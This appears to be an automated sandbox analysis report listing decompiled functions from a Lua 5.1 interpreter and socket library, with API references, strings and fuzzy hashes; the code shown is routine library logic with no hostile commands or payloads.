Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkudata.sprintf
String ID: %.35s expected
API String ID: 64916251-1101262856
Opcode ID: ff0a74a22f82fb1a136064f557a457a85cde0c475186238e4a39d17074ac0393
Instruction ID: 6da7dabe079d824ba948eb53a2316b1f903c1eef69f516632b626d3cf8a2b527
Opcode Fuzzy Hash: ff0a74a22f82fb1a136064f557a457a85cde0c475186238e4a39d17074ac0393
Instruction Fuzzy Hash: 18E0E5336142153F8610A68D9C45E5FF7BCE9C5761F800919FE5593101E125B81587F2

Uniqueness

Uniqueness Score: -1.00%

Function 00991250, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00991250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t13;
				void* _t14;
				intOrPtr _t15;

				_t11 = _a8;
				_t15 = _a4;
				_t13 = _a12;
				_t14 = E009912D0(_t6, _t15, _t11, _t13);
				if(_t14 == 0) {
					sprintf( &_v48, "%.35s expected", _t11);
					_push( &_v48);
					_push(_t13);
					_push(_t15);
					L00994B2A();
				}
				return _t14;
			}

0x00991254
0x00991259
0x0099125f
0x0099126b
0x00991272
0x0099127f
0x00991289
0x0099128a
0x0099128b
0x0099128c
0x00991291
0x0099129d

APIs

Part of subcall function 009912D0: lua_getmetatable.LUA5.1(?,?,?,?,0099126B,?,?,?), ref: 009912DC

sprintf.MSVCRT ref: 0099127F
luaL_argerror.LUA5.1(?,?,?), ref: 0099128C

Strings

%.35s expected, xrefs: 00991279

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_getmetatable.sprintf
String ID: %.35s expected
API String ID: 3016483422-1101262856
Opcode ID: d2c5f72b8ea27e6cef46b4119514532650cd42d0b95ca99caf232d1be4d9cf91
Instruction ID: 54f49229ee818624dd74d72bbdbee3e39624f047d919286d19eb80b880cdfad4
Opcode Fuzzy Hash: d2c5f72b8ea27e6cef46b4119514532650cd42d0b95ca99caf232d1be4d9cf91
Instruction Fuzzy Hash: AFE0E5336042193F8610B78D9C45E9FF7ACE9D5761F800919FE6893111E165B81587F2

Uniqueness

Uniqueness Score: -1.00%

Function 100163A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100163A0(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t5;
				void* _t8;

				_t9 = _a4;
				_t8 = E100163F0(__ecx, __eflags, _a4, E1000F4A0(__eflags, _a4, 1, 0), "path");
				_t15 = _t8;
				if(_t8 != 0) {
					_t5 = E1000FD30(_t15, _t9, _t8);
					_t16 = _t5;
					if(_t5 != 0) {
						E10016560(_t16, _t9, _t8);
					}
				}
				return 1;
			}

0x100163a1
0x100163bc
0x100163c1
0x100163c3
0x100163c7
0x100163cf
0x100163d1
0x100163d5
0x100163da
0x100163d1
0x100163e4

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 100163AB

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

Part of subcall function 100163F0: luaL_gsub.LUA5.1(?,?,1001939C,1001A8F0,?,?,?,?,100163BC,?,00000000,path,?,00000001,00000000), ref: 10016408
Part of subcall function 100163F0: lua_getfield.LUA5.1(?,FFFFD8EF,?,?,?,1001939C,1001A8F0,?,?,?,?,100163BC,?,00000000,path,?), ref: 1001641A
Part of subcall function 100163F0: lua_tolstring.LUA5.1(?,000000FF,00000000,?,FFFFD8EF,?,?,?,1001939C,1001A8F0,?,?,?,?,100163BC,?), ref: 10016424
Part of subcall function 100163F0: luaL_error.LUA5.1(?,'package.%s' must be a string,?), ref: 10016439
Part of subcall function 100163F0: lua_pushlstring.LUA5.1(?,1001AB10,00000000), ref: 10016449
Part of subcall function 100163F0: lua_tolstring.LUA5.1(?,000000FF,00000000,10019034,00000000), ref: 10016469
Part of subcall function 100163F0: luaL_gsub.LUA5.1(?,00000000,?,10019034,00000000), ref: 10016473
Part of subcall function 100163F0: lua_remove.LUA5.1(?,000000FE,?,00000000,?,10019034,00000000), ref: 1001647D
Part of subcall function 100163F0: lua_pushfstring.LUA5.1(?,no file '%s',00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 10016496
Part of subcall function 100163F0: lua_remove.LUA5.1(?,000000FE,?,no file '%s',00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001649E
Part of subcall function 100163F0: lua_concat.LUA5.1(?,00000002,?,000000FE,?,no file '%s',00000000), ref: 100164A6

luaL_loadfile.LUA5.1(?,00000000), ref: 100163C7

Part of subcall function 1000FD30: lua_gettop.LUA5.1(?), ref: 1000FD42
Part of subcall function 1000FD30: lua_pushlstring.LUA5.1(?,=stdin,00000006), ref: 1000FD76
Part of subcall function 1000FD30: getc.MSVCRT(00000000), ref: 1000FD8E
Part of subcall function 1000FD30: getc.MSVCRT(?), ref: 1000FDA5
Part of subcall function 1000FD30: getc.MSVCRT(?), ref: 1000FDB9
Part of subcall function 1000FD30: getc.MSVCRT(?), ref: 1000FDCD
Part of subcall function 1000FD30: fclose.MSVCRT ref: 1000FDF4
Part of subcall function 1000FD30: fopen.MSVCRT ref: 1000FE00

Part of subcall function 10016560: lua_tolstring.LUA5.1(?,000000FF,00000000,?,100163DA,?,00000000), ref: 1001656A
Part of subcall function 10016560: lua_tolstring.LUA5.1(?,00000001,00000000,?,00000000,100163DA,?,00000000), ref: 1001657D
Part of subcall function 10016560: luaL_error.LUA5.1(?,error loading module '%s' from file '%s':%s,00000000,?,?,00000000,100163DA,?,00000000), ref: 1001658C

Strings

path, xrefs: 100163B0

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_tolstring.$getc$L_error.L_gsub.lua_pushlstring.lua_remove.$L_checklstring.L_loadfile.fclosefopenlua_concat.lua_getfield.lua_gettop.lua_pushfstring.
String ID: path
API String ID: 3350879039-190089999
Opcode ID: bfcedf265091e346f81d13871c5effd5e0b284f922afac5d3c00ba15a8292f9e
Instruction ID: 96e5524b2ea6dd18f12a8da337860bfaa997c924cfc69f17c3eaeac9104399d8
Opcode Fuzzy Hash: bfcedf265091e346f81d13871c5effd5e0b284f922afac5d3c00ba15a8292f9e
Instruction Fuzzy Hash: D2E0C23B95152032E512911D7C06FDF249DCFD6691F450029FD04AE246EAA9FBD381F7

Uniqueness

Uniqueness Score: -1.00%

Function 10012C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012C90(void* __eflags, intOrPtr _a4) {
				int _t6;
				struct _IO_FILE** _t12;
				void* _t18;

				_t12 = E1000F370(__eflags, _t18, _a4, 1, "FILE*");
				_t6 = _pclose( *_t12);
				 *_t12 = 0;
				return E10012160(0 | _t6 != 0xffffffff, _t18, _a4, 0 | _t6 != 0xffffffff, 0);
			}

0x10012ca3
0x10012ca8
0x10012cbc
0x10012ccc

APIs

luaL_checkudata.LUA5.1(?,00000001,FILE*), ref: 10012C9E

Part of subcall function 1000F370: lua_touserdata.LUA5.1(?,?), ref: 1000F37E
Part of subcall function 1000F370: lua_getmetatable.LUA5.1(?,?), ref: 1000F392
Part of subcall function 1000F370: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F3A5
Part of subcall function 1000F370: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 1000F3AF
Part of subcall function 1000F370: lua_settop.LUA5.1(?,000000FD), ref: 1000F3BE

_pclose.MSVCRT ref: 10012CA8

Part of subcall function 10012160: _errno.MSVCRT ref: 10012161
Part of subcall function 10012160: lua_pushboolean.LUA5.1(?,00000001), ref: 10012178

Strings

FILE*, xrefs: 10012C96

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkudata._errno_pcloselua_getfield.lua_getmetatable.lua_pushboolean.lua_rawequal.lua_settop.lua_touserdata.
String ID: FILE*
API String ID: 2167973285-3635956593
Opcode ID: f334c259699b0a1801fbed89a4b57433d25d33b23fe8ca064f4cfcd0b22c0fc7
Instruction ID: 2b06076d5a8a6548df330f6bd70ca0592250cc2781c72a0009aa92acf92d3ab0
Opcode Fuzzy Hash: f334c259699b0a1801fbed89a4b57433d25d33b23fe8ca064f4cfcd0b22c0fc7
Instruction Fuzzy Hash: 2EE0CDB62001107BD2209B2CAC45F5F72FCEF86630F14051DF155D71D1D2B0DCC18660

Uniqueness

Uniqueness Score: -1.00%

Function 10012690, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012690(intOrPtr _a4, struct _IO_FILE* _a8) {
				intOrPtr _v4;
				int _t5;
				void* _t13;
				intOrPtr* _t14;

				_t5 = fscanf(_a8, "%lf", _t13);
				_t14 = _t13 + 0xc;
				if(_t5 != 1) {
					return 0;
				} else {
					E100018E0(_a4,  *_t14, _v4);
					return 1;
				}
			}

0x100126a2
0x100126a8
0x100126ae
0x100126d5
0x100126b0
0x100126bf
0x100126cf
0x100126cf

APIs

fscanf.MSVCRT ref: 100126A2
lua_pushnumber.LUA5.1(?,00000000,?), ref: 100126BF

Strings

%lf, xrefs: 1001269C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: fscanflua_pushnumber.
String ID: %lf
API String ID: 65929279-2891890143
Opcode ID: 1b3c85390884bc265a72f12abc6793d9d3fc7707c6268349c6746777b983fc11
Instruction ID: 91bebd8714f4cc53cdae1c762f5db95c17c590065d56022bbe3e28d47b60da66
Opcode Fuzzy Hash: 1b3c85390884bc265a72f12abc6793d9d3fc7707c6268349c6746777b983fc11
Instruction Fuzzy Hash: 3DE0BFB9A042047FD604DB64EC4186B77E8FBC4641F84892CF94DC7241E67ADD98C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 10012CD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10012CD0(void* __eflags, intOrPtr _a4) {
				signed int _t4;
				struct _IO_FILE** _t9;
				void* _t14;

				_t8 = _a4;
				_t9 = E1000F370(__eflags, _t14, _a4, 1, "FILE*");
				_t4 = fclose( *_t9);
				asm("sbb eax, eax");
				_t6 =  ~_t4 + 1;
				 *_t9 = 0;
				return E10012160( ~_t4 + 1, _t14, _t8, _t6, 0);
			}

0x10012cd2
0x10012ce3
0x10012ce8
0x10012cf0
0x10012cf4
0x10012cf5
0x10012d07

APIs

luaL_checkudata.LUA5.1(?,00000001,FILE*), ref: 10012CDE

Part of subcall function 1000F370: lua_touserdata.LUA5.1(?,?), ref: 1000F37E
Part of subcall function 1000F370: lua_getmetatable.LUA5.1(?,?), ref: 1000F392
Part of subcall function 1000F370: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F3A5
Part of subcall function 1000F370: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 1000F3AF
Part of subcall function 1000F370: lua_settop.LUA5.1(?,000000FD), ref: 1000F3BE

fclose.MSVCRT ref: 10012CE8

Part of subcall function 10012160: _errno.MSVCRT ref: 10012161
Part of subcall function 10012160: lua_pushboolean.LUA5.1(?,00000001), ref: 10012178

Strings

FILE*, xrefs: 10012CD6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkudata._errnofcloselua_getfield.lua_getmetatable.lua_pushboolean.lua_rawequal.lua_settop.lua_touserdata.
String ID: FILE*
API String ID: 82883824-3635956593
Opcode ID: 840091623cd79a8aa4bbe9c2117baf9351e354a9ee849dd2c97c4d4b6937b355
Instruction ID: 5c27961107024f9d745ae5ad47a6c47d70051f6b1d8190155e399615ae053d5c
Opcode Fuzzy Hash: 840091623cd79a8aa4bbe9c2117baf9351e354a9ee849dd2c97c4d4b6937b355
Instruction Fuzzy Hash: 7AE0C2B5600210BEE220DA28AC41F7B72F8EB8A620F100409F545D7281D274A8814660

Uniqueness

Uniqueness Score: -1.00%

Function 00991BE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00991BE0(intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr _t5;

				_t5 = _a4;
				_t2 = E00991250(_t5, "tcp{any}", 1);
				_push(2);
				_push(_t5);
				L00994B66();
				L00994BD0();
				 *_t2 = _t2;
				return 0;
			}

0x00991be1
0x00991bee
0x00991bf3
0x00991bf5
0x00991bf8
0x00991c00
0x00991c05
0x00991c0b

APIs

Part of subcall function 00991250: sprintf.MSVCRT ref: 0099127F
Part of subcall function 00991250: luaL_argerror.LUA5.1(?,?,?), ref: 0099128C

luaL_checknumber.LUA5.1(?,00000002,?,tcp{any},00000001), ref: 00991BF8
_ftol.MSVCRT ref: 00991C00

Strings

tcp{any}, xrefs: 00991BE8

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checknumber._ftolsprintf
String ID: tcp{any}
API String ID: 53105629-1675391766
Opcode ID: 4d7970f8f3b4ddd1bed3f779a36f365f3e2dbdde0026cfac9023d7df0356f67a
Instruction ID: 17c6ff42071942ca29fe03c59e619391ee9a75e4401b4e5695a93365eb7ed11d
Opcode Fuzzy Hash: 4d7970f8f3b4ddd1bed3f779a36f365f3e2dbdde0026cfac9023d7df0356f67a
Instruction Fuzzy Hash: B8D0A9726142223AEF0076BC6C03F8F22889FC2760F010061F100EB182E6A0D80242AA

Uniqueness

Uniqueness Score: -1.00%

Function 00993C50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00993C50(intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr _t5;

				_t5 = _a4;
				_t2 = E00991250(_t5, "udp{any}", 1);
				_push(2);
				_push(_t5);
				L00994B66();
				L00994BD0();
				 *_t2 = _t2;
				return 0;
			}

0x00993c51
0x00993c5e
0x00993c63
0x00993c65
0x00993c68
0x00993c70
0x00993c75
0x00993c7b

APIs

Part of subcall function 00991250: sprintf.MSVCRT ref: 0099127F
Part of subcall function 00991250: luaL_argerror.LUA5.1(?,?,?), ref: 0099128C

luaL_checknumber.LUA5.1(?,00000002,?,udp{any},00000001), ref: 00993C68
_ftol.MSVCRT ref: 00993C70

Strings

udp{any}, xrefs: 00993C58

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checknumber._ftolsprintf
String ID: udp{any}
API String ID: 53105629-1792101638
Opcode ID: 96586c6aa16ccc174a7ee0654f0a75ea37ef8d36c3b477db0cc667bb314a2248
Instruction ID: e2e28c2035b9aed447585a6ec1af39e97f6496fbb0c7190e26f8fba364f4edf8
Opcode Fuzzy Hash: 96586c6aa16ccc174a7ee0654f0a75ea37ef8d36c3b477db0cc667bb314a2248
Instruction Fuzzy Hash: 6FD0A9726152222AEF0076BC6C03F8F2A889FD6764F010061F100EB182E6A0C80242A6

Uniqueness

Uniqueness Score: -1.00%

Function 1000F470, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F470(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				void* _t3;

				_t7 = _a8;
				_t6 = _a4;
				_t3 = E10001410(__eflags, _a4, _a8);
				_t12 = _t3 - 0xffffffff;
				if(_t3 == 0xffffffff) {
					return E1000F090(__ebx, _t7, _t12, _t6, _t7, "value expected");
				}
				return _t3;
			}

0x1000f471
0x1000f476
0x1000f47c
0x1000f484
0x1000f487
0x00000000
0x1000f495
0x1000f49a

APIs

lua_type.LUA5.1(?,?), ref: 1000F47C
luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

Strings

value expected, xrefs: 1000F489

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_error.lua_getstack.lua_type.
String ID: value expected
API String ID: 1081076926-841185261
Opcode ID: f49d4d61d69da8b4060fbf0356cad906b4af7f6955dd9632042e9c94b85d2c0f
Instruction ID: e3927f922e764ab865d1ccd8ee7431ac366611c1bb59692a42b3670c0049da55
Opcode Fuzzy Hash: f49d4d61d69da8b4060fbf0356cad906b4af7f6955dd9632042e9c94b85d2c0f
Instruction Fuzzy Hash: 78D0A72B90811036800091293C41CEF776CCED35B4B054629F52893156A270648151F2

Uniqueness

Uniqueness Score: -1.00%

Function 1000F3E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000F3E0(intOrPtr _a4, intOrPtr _a8, char _a12) {
				void* _t5;

				_t8 = _a4;
				_t5 = E10001030(_a4, _a8);
				if(_t5 == 0) {
					return E1000F230(_t8, "stack overflow (%s)", _a12);
				}
				return _t5;
			}

0x1000f3e5
0x1000f3eb
0x1000f3f5
0x00000000
0x1000f407
0x1000f40b

APIs

lua_checkstack.LUA5.1(?,?), ref: 1000F3EB
luaL_error.LUA5.1(?,stack overflow (%s),?), ref: 1000F402

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

Strings

stack overflow (%s), xrefs: 1000F3FC

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.L_where.lua_checkstack.lua_concat.lua_error.lua_pushvfstring.
String ID: stack overflow (%s)
API String ID: 2358384956-1484391883
Opcode ID: f2ba31f9d070d8e8b383a3ac3da485fd480663a3d509efbce06b4f17d16f5328
Instruction ID: de322766641740fb822ad7b0ef498d2428fb7466a19179360c68ac1272a94917
Opcode Fuzzy Hash: f2ba31f9d070d8e8b383a3ac3da485fd480663a3d509efbce06b4f17d16f5328
Instruction Fuzzy Hash: 09D0A9BA8192223BE200C600FC02DEB339CDF841C4F08040CFA4482109E724FE82CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A21AE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00A21AE0(long long __fp0, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				_push(0xa25388);
				_push("int");
				_push(1);
				_push(_t3);
				L00A23F98();
				asm("fild dword [eax*4+0xa25340]");
				 *((long long*)(_t4 + 8)) = __fp0;
				_push(_t3);
				L00A23F80();
				return 1;
			}

0x00a21ae1
0x00a21ae5
0x00a21aea
0x00a21aef
0x00a21af1
0x00a21af2
0x00a21af7
0x00a21b01
0x00a21b04
0x00a21b05
0x00a21b13

APIs

luaL_checkoption.LUA5.1(?,00000001,int,00A25388), ref: 00A21AF2
lua_pushnumber.LUA5.1(?), ref: 00A21B05

Strings

int, xrefs: 00A21AEA

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkoption.lua_pushnumber.
String ID: int
API String ID: 1427278718-340908721
Opcode ID: 47a1368e69a966a410d320e57f5bcd4f4531e9d9da563a5989cebcda0805d30a
Instruction ID: 5be001418c666e270d5572077557ef25a9303e4eb543f34744fff0329e0f0604
Opcode Fuzzy Hash: 47a1368e69a966a410d320e57f5bcd4f4531e9d9da563a5989cebcda0805d30a
Instruction Fuzzy Hash: 73D0A932E64A3036CA10BA2CBE12BD932647F02341F800830F4406E181C6FA26A2029A

Uniqueness

Uniqueness Score: -1.00%

Function 00A21B20, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00A21B20(long long __fp0, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				_push(0xa25418);
				_push("char");
				_push(1);
				_push(_t3);
				L00A23F98();
				asm("fild dword [eax*4+0xa253d0]");
				 *((long long*)(_t4 + 8)) = __fp0;
				_push(_t3);
				L00A23F80();
				return 1;
			}

0x00a21b21
0x00a21b25
0x00a21b2a
0x00a21b2f
0x00a21b31
0x00a21b32
0x00a21b37
0x00a21b41
0x00a21b44
0x00a21b45
0x00a21b53

APIs

luaL_checkoption.LUA5.1(?,00000001,char,00A25418), ref: 00A21B32
lua_pushnumber.LUA5.1(?), ref: 00A21B45

Strings

char, xrefs: 00A21B2A

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkoption.lua_pushnumber.
String ID: char
API String ID: 1427278718-2365478815
Opcode ID: a1db28552e28bd5cffa5cab8ac85f0bebd87a81c49d079d1474fc8949a9d27f4
Instruction ID: e2845abd10eea73a21f5161fcaa530372e4b86604c2ebdc9d7da14b1e15a0194
Opcode Fuzzy Hash: a1db28552e28bd5cffa5cab8ac85f0bebd87a81c49d079d1474fc8949a9d27f4
Instruction Fuzzy Hash: D2D0A932DA593072C9107A6CBE02BD932247F02702F404830F0406A1C2DAFA66A207EA

Uniqueness

Uniqueness Score: -1.00%

Function 100100C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100100C0(void* __eflags, intOrPtr _a4) {

				_push(E100016F0(__eflags, _a4, 0xffffffff, 0));
				fprintf(__imp___iob + 0x40, "PANIC: unprotected error in call to Lua API (%s)\n");
				return 0;
			}

0x100100d4
0x100100de
0x100100e9

APIs

lua_tolstring.LUA5.1(?,000000FF,00000000), ref: 100100C9
fprintf.MSVCRT ref: 100100DE

Strings

PANIC: unprotected error in call to Lua API (%s), xrefs: 100100D8

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: fprintflua_tolstring.
String ID: PANIC: unprotected error in call to Lua API (%s)
API String ID: 3479231366-3475711442
Opcode ID: de3ed53d8bb76be1118d3ed8545df56a22a68bac6fa37cb381fd691fc013386b
Instruction ID: 03066b0783d6fd297a0dd810a6237e5754e0cf847fa7c31d905c26b7a4d2e619
Opcode Fuzzy Hash: de3ed53d8bb76be1118d3ed8545df56a22a68bac6fa37cb381fd691fc013386b
Instruction Fuzzy Hash: 3FD012F4514311B7F604D7789D95F463268A744264F144748F71D961D6CA35F4018654

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00401000(void* __eax, intOrPtr _a4) {
				intOrPtr _t3;

				_t3 = _a4;
				_push(0);
				_push(0);
				_push(0);
				_push(_t3);
				L00401F84();
				_push("interrupted!");
				_push(_t3);
				L00401F24();
				return __eax;
			}

0x00401001
0x00401005
0x00401007
0x00401009
0x0040100b
0x0040100c
0x00401011
0x00401016
0x00401017
0x00401020

APIs

lua_sethook.LUA5.1(?,00000000,00000000,00000000), ref: 0040100C
luaL_error.LUA5.1(?,interrupted!,?,00000000,00000000,00000000), ref: 00401017

Strings

interrupted!, xrefs: 00401011

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.lua_sethook.
String ID: interrupted!
API String ID: 3268213862-4124862318
Opcode ID: be5a52660c0e3419c9ec3dd70b7333d40248d44ca4d1e59472e8ce635f5712e7
Instruction ID: 5fc3c1333a75a2fde148d886efba82eb5488c6b3636bb9de16bace9a97fab2a4
